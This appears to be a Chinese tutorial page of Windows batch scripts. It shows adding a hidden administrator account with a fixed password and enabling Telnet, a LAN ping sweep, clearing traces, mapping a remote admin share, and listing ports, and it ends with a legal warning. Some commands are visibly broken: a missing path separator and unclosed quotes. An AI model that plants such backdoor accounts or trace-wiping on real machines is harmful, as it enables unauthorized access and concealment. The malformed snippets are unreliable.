一、实用批处理脚本示例

1. 创建隐藏用户与提权

通过批处理脚本添加用户并加入管理员组（需管理员权限）：

bat

@echo off

net user heibai lovechina /add

net localgroup Administrators heibai /add

net start telnet

功能：创建用户 `heibai`，密码 `lovechina`，并赋予管理员权限，同时启动 Telnet 服务。

2. 局域网设备扫描

扫描局域网内活跃设备并获取 MAC 地址：

bat

@echo off

for /L %%i IN (1,1,254) DO ping -n 1 192.168.1.%%i

arp -a > devices.txt

输出结果保存为 `devices.txt`，包含 IP 和 MAC 地址。

3. 一键清理系统痕迹

删除临时文件和浏览器缓存：

bat

@echo off

del /q /f %temp%.

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 8

功能：清理临时文件和 IE 缓存。

4. 远程文件操作

映射远程主机共享文件夹到本地：

bat

@echo off

net use Z: 192.168.1.100C$ "password" /user:"username

将远程主机的 C 盘映射为本地 Z 盘。

5. 端口与进程监控

查看系统进程占用的端口：

bat

@echo off

netstat -ano | find "TCP

显示所有 TCP 连接及对应的进程 ID。

二、相关工具下载与功能

1. 安全检查工具

2. 自动化攻击工具（风险提示）

三、脚本编写基础

1. 常用语法

2. 中文乱码解决

在脚本开头添加 `chcp 65001` 切换为 UTF-8 编码。

四、注意事项

1. 法律风险：未经授权的网络渗透、数据破坏均属违法行为，请勿用于非法用途。

2. 防御建议：定期更新系统补丁，关闭不必要的端口和服务，使用防火墙和杀毒软件。

如需完整代码或工具下载，可参考以下来源：

CSDN 教程（[网页54](https://m.blog.csdn.net/rulaixiong/article/details/135988708)）包含脚本编写基础。